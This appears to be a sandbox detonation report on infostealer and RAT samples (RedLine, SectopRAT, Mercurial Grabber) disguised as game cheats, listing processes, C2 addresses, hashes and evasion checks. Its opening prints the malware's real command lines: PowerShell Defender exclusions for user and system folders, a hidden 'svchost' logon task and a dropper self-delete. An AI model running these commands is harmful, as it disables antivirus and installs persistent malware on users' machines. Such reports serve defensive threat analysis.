"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\system32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp

Files

memory/2128-0-0x00000000748E1000-0x00000000748E2000-memory.dmp

memory/2128-2-0x00000000748E0000-0x0000000074E8B000-memory.dmp

memory/2128-1-0x00000000748E0000-0x0000000074E8B000-memory.dmp

\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe

MD5 56a7502c31f7e8b9df6026cca035d000
SHA1 a2e1dea33bec675650559a148f78f831a0c11886
SHA256 b6dffd0fcf337c0da1439857c9bb162c1965641e644163f702f29bc84fd04b9f
SHA512 82b2331d087d0543ef5004d59206f618db7ad91225b4720b302c7da2263972cadebc8412a3fa85262c993bfab5247cfa4cfea01d80ea4cbeb59c0ef7fbebe499

\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe

MD5 164b5610097d3c76850d0d3cc1f3892a
SHA1 31c439c5dab3c0a98ca827a07e17f903b8aae2f9
SHA256 e922d71f77061f2ce7100d4f1aea67b8477d7e9cd9e40a10a411868cf93bbc52
SHA512 fa832118802c3b4107911a541e8498a6c3acd1fba50c3e0a115899d521a77e293325397296d00353abd6d10965dc74b8fea1ee58dafa6547f05c76bd6e64450e

memory/2128-15-0x00000000748E0000-0x0000000074E8B000-memory.dmp

memory/2188-16-0x000007FEF5E93000-0x000007FEF5E94000-memory.dmp

memory/2188-17-0x000000013FA00000-0x000000013FA10000-memory.dmp

memory/2720-22-0x000000001B810000-0x000000001BAF2000-memory.dmp

memory/2720-23-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fe7691d2ecc05d98b3d4431abdc103c9
SHA1 96d666b1984784b067cfec45c066fdfb44f15409
SHA256 733a2010bc40d1bd02beb0480a22f5ece50583388780d8ae9ff404d417f34562
SHA512 4fcce183c510af40b5a75f55e7fdaeeeed0f00d95494329c33d6dd07f45acdedce1f51fdbd03b2054f87341d1221884dfe363239a3144613d8d1257848d3198e

memory/2084-29-0x000000001B690000-0x000000001B972000-memory.dmp

memory/2084-30-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2452-46-0x000000013FCC0000-0x000000013FCCE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\svchost64.exe

MD5 a5bdb33481f19152370a4cbe486c1790
SHA1 d657448275485590e0b141bc3965f03650636e47
SHA256 ead94cc9778691b1388fc31b4a9ec1bb1220073508e80228bd85d325612d7075
SHA512 61612206312611b2026e8a38a4b1f18a24fb8605e75bd2fe26d4132a6a4ab890e4096d8eb96e5f2cfc312885451f156ef6e56bd00943e1745ad532bbfef3d0fe

memory/1632-53-0x000000013F930000-0x000000013F940000-memory.dmp

memory/2936-59-0x00000000021D0000-0x00000000021D8000-memory.dmp

memory/680-80-0x000000013F7F0000-0x000000013F7FE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 0dc0c432c76b5f23dec8f2da05da574f
SHA1 f93bb2cd4e300c5b7808c8aeb3d80797975ccfb0
SHA256 9d4ed1c19be402033e56523eb9a78a928102c689c82e27ab926ea6f2206e8fee
SHA512 5cc10e825cc53878e89b44e9ae01973c194955364992cd769aaac49ecf5af392b01f051e2fe800c617a391555aa385ea56a2ae4d565287c1a5e42af93f1812e9

memory/976-88-0x000000013F350000-0x000000013F356000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCEB6.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarCEB9.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2460-201-0x000000013F1E0000-0x000000013F1F0000-memory.dmp

memory/2976-227-0x000000013FFE0000-0x000000013FFEE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 929a2212220e9b880c5e949576014004
SHA1 dc936f254917a52bda0ee7bfec4c9c61628504b8
SHA256 0a7c8aeea55c9f23a296e9be56ad3063f945a456788680d4e15af58831cb4a59
SHA512 d693de9ee33cbdf87e42620536497ca64be7eebb7d621deb74daeafef23c5a7cc683cbc22b00e6fd7f84a174e7e887f5c1b35bac56b2fb33ae7c77e9543cf501

memory/2148-289-0x000000013F7B0000-0x000000013F7C0000-memory.dmp

memory/1128-315-0x000000013F230000-0x000000013F23E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 88f0d219c19c0f974b513dff80e88bbe
SHA1 1e6ccf25389c37e5fef8cc2319ce466b9d09b465
SHA256 e3e0e3d9bb8c72e28d1bc4d2820be7aae7647cb3820a76c8fdd1d45614096155
SHA512 26b730fddaceb4a317f68cbe387331bab03e7e3e10786e8cad0983a512d9159c5610c14e72f83135451a4b4f9d5fc1cb5362b09d552a6fedddb37b3f0931732c

memory/1632-377-0x000000013FAD0000-0x000000013FAE0000-memory.dmp

memory/2508-396-0x000000013F720000-0x000000013F72E000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win7-20240903-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2420 set thread context of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
PID 2420 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe

"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 jonaianell.xyz udp

Files

memory/2420-0-0x0000000000F00000-0x0000000000F64000-memory.dmp

memory/1796-13-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1796-9-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1796-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1796-6-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1796-5-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1796-11-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1796-1-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1796-3-0x0000000000400000-0x000000000041E000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"

Signatures

Mercurial Grabber Stealer

stealer mercurialgrabber

Mercurialgrabber family

mercurialgrabber

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip4.seeip.org N/A N/A
N/A ip-api.com N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe

"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip4.seeip.org udp
US 23.128.64.141:443 ip4.seeip.org tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 99.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/2720-0-0x00007FFDD2E43000-0x00007FFDD2E45000-memory.dmp

memory/2720-1-0x00000000007C0000-0x00000000007D0000-memory.dmp

memory/2720-2-0x00007FFDD2E40000-0x00007FFDD3901000-memory.dmp

memory/2720-3-0x00007FFDD2E43000-0x00007FFDD2E45000-memory.dmp

memory/2720-4-0x00007FFDD2E40000-0x00007FFDD3901000-memory.dmp

memory/2720-8-0x000000001BB20000-0x000000001BB50000-memory.dmp

memory/2720-9-0x00007FFDD2E40000-0x00007FFDD3901000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

138s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\launcher.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2204 set thread context of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe
PID 2204 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\launcher.exe C:\Users\Admin\AppData\Local\Temp\launcher.exe

Processes

C:\Users\Admin\AppData\Local\Temp\launcher.exe

"C:\Users\Admin\AppData\Local\Temp\launcher.exe"

C:\Users\Admin\AppData\Local\Temp\launcher.exe

C:\Users\Admin\AppData\Local\Temp\launcher.exe

C:\Users\Admin\AppData\Local\Temp\launcher.exe

C:\Users\Admin\AppData\Local\Temp\launcher.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 3.68.106.170:59223 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
DE 3.68.106.170:59223 tcp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
DE 3.68.106.170:59223 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
DE 3.68.106.170:59223 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
DE 3.68.106.170:59223 tcp
DE 3.68.106.170:59223 tcp

Files

memory/2204-0-0x000000007444E000-0x000000007444F000-memory.dmp

memory/2204-1-0x0000000000230000-0x0000000000294000-memory.dmp

memory/2204-2-0x0000000004C10000-0x0000000004C86000-memory.dmp

memory/2204-3-0x00000000026D0000-0x00000000026EE000-memory.dmp

memory/2204-4-0x0000000074440000-0x0000000074BF0000-memory.dmp

memory/2204-5-0x0000000005440000-0x00000000059E4000-memory.dmp

memory/2844-6-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\launcher.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/2844-9-0x0000000074440000-0x0000000074BF0000-memory.dmp

memory/2844-12-0x0000000005780000-0x0000000005792000-memory.dmp

memory/2844-11-0x0000000005D30000-0x0000000006348000-memory.dmp

memory/2204-10-0x0000000074440000-0x0000000074BF0000-memory.dmp

memory/2844-13-0x00000000057E0000-0x000000000581C000-memory.dmp

memory/2844-14-0x0000000005820000-0x000000000586C000-memory.dmp

memory/2844-15-0x0000000074440000-0x0000000074BF0000-memory.dmp

memory/2844-16-0x0000000005A90000-0x0000000005B9A000-memory.dmp

memory/2844-17-0x0000000074440000-0x0000000074BF0000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-09 16:28

Reported

2024-11-09 16:31

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
NL 45.14.49.109:54819 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
NL 45.14.49.109:54819 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
NL 45.14.49.109:54819 tcp
NL 45.14.49.109:54819 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
NL 45.14.49.109:54819 tcp
